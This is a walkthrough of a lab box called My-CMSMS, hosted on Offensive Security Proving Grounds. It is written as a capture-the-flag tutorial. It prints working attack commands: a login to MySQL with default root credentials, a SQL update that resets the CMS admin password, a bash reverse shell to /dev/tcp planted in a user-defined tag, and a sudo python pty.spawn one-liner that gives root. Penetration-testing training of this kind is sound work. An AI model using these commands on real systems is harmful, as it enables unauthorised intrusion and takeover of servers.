PG — My-CMSMS— Walkthrough (Offensive Security Proving Grounds Play Boxes)
Introduction
This article aims to walk you through My-CMSMC box, produced by Pankaj Verma and hosted on Offensive Security’s Proving Grounds Labs. Anyone who has access to Vulnhub and Offensive Security’s Proving Grounds Play or Practice can try to pwn this Linux box, this is an intermediate and fun box. Hope you enjoy reading the walkthrough!
Reconnaissance
As we are already provided with IP address of the box, we will scan it via Nmap.
Scanning
We are going to scan the IP for all open ports by typing the following command on our terminal.
nmap -p- 192.168.x.x
After waiting for a while, we have got our results as shown below:
To gather further information on ports found by nmap, we will add some more arguments specifying open ports. -sV will scan to show service versions of applications on open ports, and -sC will run default scripts on services in order to check whether there is a vulnerability.
nmap -p 22,80,3306 192.168.x.x -sV -sC
In a short while, we have got our results and more details regarding open ports. And we decide to start enumeration on port 80 since port 22 is not a logical starting point because it does not provide us with a broad attack surface as an http server does. Then, we will go on enumeration on port 3306 which is a default MySQL database server.
Enumeration
We open our browser and type IP address of the box and come accross with CMS Made Simple.
Since we have a CMS installed on Http server, we will enumerate further to see if we have a public exploit. So we searchsploit CMS name.
We see that there are a number of public exploits for CMS Made Simple, but most of them are Authenticated, which means we need valid credentials to be able to use them.
We will brutefore directories with gobuster to see if there is a useful directory.
gobuster dir -u http://192.168.x.x/ -w /usr/share/wordlists/dirb/common.txt -t 5
We find two directories /admin and /phpmyadmin by which we can have a foothold on the box if default credentials work.
We use default credentials such as admin:admin to log in on the page in /admin directory, but they do not work.
Default credentials do not work on /phpmyadmin as well.
In this case, we have MySQL server on port 3306, so we will try default MySQL credentials root:root on it to see if we are able to connect.
mysql -h 192.168.x.x -u root -p
We are able to connect to MySQL server. Now, let us exploit it.
Exploitation
As we are able to connect to MySQL server as root. We will enumerate databases and users on the server.
We use cmsms_db to enumerate further, and we will try to
select username,email,password from cms_users;
We have admin as user on the web server, so we will try to change admin password with following command in md5.
update cms_users set password = (select md5(CONCAT(IFNULL((SELECT sitepref_value FROM cms_siteprefs WHERE sitepref_name = ‘sitemask’),’ ’), ‘caesar’))) where username = ‘admin’;
We have got no warnings, which means password is changed successfully. Now we will log in on the Http server with credentials we just changed through MySQL.
After a little bit of googling, we learn that we can execute commands on the server as follows:
We click on Extensions, then we click on User defined Tags, and we will edit user_agent tag in order to be able to execute commands on the server.
We write the following command in order to get a reverse shell.
system(“bash -c ‘bash -i >& /dev/tcp/192.168.x.x/443 0>&1’”);
Now, we will set up a netcat listener on port 443.
And curl the link that we submitted our command.
curl -vv http://192.168.x.x/index.php?page=user-defined-tags
Let us chek our netcat listener to see if our command executed on the server.
And we have got a shell on the server. Now, it is time to get the low shell hash.
Privilege Escalation
We enumerate the machine to find weak services and files on the server.
And we discover .htpasswd file in /var/www/html/admin directory, which includes a base64 text.
We will decode base64 text on our attacking box to see what it is.
We decode it and encounter another text that is encoded in base32. So we decode it as well and get a user name and a password.
We try to log in armour user with SSH server, but we are not allowed to log in.
As we are not able to use SSH, we will try to escalate to armour user on the shell we have. And then get a TTY shell.
Now we check sudo permissions for the current user by typing sudo -l on the terminal, and we see that we can use python with root privileges.
So, we will use sudo command in the beginning of the process that we use for getting a TTY shell, with the help of getting a TTY shell with sudo, we will be root on the box.
sudo /usr/bin/python -c ‘import pty;pty.spawn(“/bin/bash”)’
And we get root hash.
Now we have full authority on the box. Enjoy!
